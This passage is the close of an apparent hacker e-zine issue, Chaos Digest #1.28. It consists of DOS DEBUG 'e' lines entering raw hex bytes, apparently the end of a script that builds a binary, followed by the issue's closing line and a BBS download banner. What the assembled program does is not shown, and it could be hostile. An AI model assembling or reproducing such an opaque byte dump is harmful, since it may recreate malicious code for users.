e 0ED0  8B 60 11 A3 2C 13 8B 60 17 A3 2A 13 E8 8C 00 19
e 0EE0  CF D3 F8 08 9F 0E 1C 11 2E AA 05 3C 24 3D 89 00
e 0EF0  2D 02 08 D5 06 1F 11 01 38 4B E8 60 EF 37 B6 6B
e 0F00  AA 40 37 BA 98 7C 86 D0 A6 11 4F 4B 97 C5 88 11
e 0F10  4F 44 97 C3 88 10 48 87 E2 B0 AD 56 B0 59 B4 B7
e 0F20  AD 10 88 59 B4 B6 F7 97 5E 0C 65 EE 6A 93 B6 6B
e 0F30  18 43 6B C4 A5 BB 2E A6 2D DA 02 13 74 25 FA 20
e 0F40  27 D0 E8 D8 E8 27 96 8D 76 90 A2 B0 7F 8D 76 90
e 0F50  A1 B0 2E 8D 76 90 A0 B0 B5 4B 62 87 4B 9D 97 65
e 0F60  B6 B6 A3 B1 17 9D B0 B2 EE EA 7E BF A3 BE 67 0E
e 0F70  A7 2D 00 02 49 4D 52 15 FE 28 33 00 52 68 E8 E4
e 0F80  E8 10 44 D0 66 60 A0 83 B3 90 67 44 73 5B B4 99

------------------------------

End of Chaos Digest #1.28
************************************

Downloaded From P-80 International Information Systems 304-744-2253
